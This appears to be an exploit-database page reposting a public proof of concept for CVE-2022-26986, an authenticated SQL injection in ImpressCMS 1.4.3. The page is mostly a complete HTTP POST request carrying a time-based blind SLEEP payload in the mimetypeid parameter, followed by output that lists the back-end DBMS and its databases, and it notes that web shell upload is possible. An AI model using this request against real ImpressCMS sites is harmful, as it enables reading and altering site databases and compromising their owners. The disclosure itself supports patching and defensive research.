Advertisement






Authenticated Sql Injection in ImpressCMS v1.4.3

CVE Category Price Severity
CVE-2022-26986 CWE-89 $1,500 High
Author Risk Exploitation Type Date
Fikri Fadzil High Remote 2022-10-12
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100033

Below is a copy:

Authenticated Sql Injection in ImpressCMS v1.4.3
# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3
# SQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26986
# Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above...
# Vendor: https://www.impresscms.org/ Download is available at: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3

###############################################
#Step1- Login with Admin Credentials
#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):

POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1
Host: 192.168.56.117
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701
Content-Length: 1011
Origin: http://192.168.56.117
Connection: close
Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1
Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3
Upgrade-Insecure-Requests: 1

-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="mimetypeid"

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="extension"

bin
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="types"

application/octet-stream
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="name"

Binary File/Linux Executable
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="icms_page_before_form"

http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="op"

addmimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="modify_button"

Submit
-----------------------------40629177308912268471540748701--

Vulnerable Payload:
1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)   //time-based blind (query SLEEP)

Output:
web application technology: Apache 2.4.52, PHP 7.4.27
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [6]:
[*] impresscms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum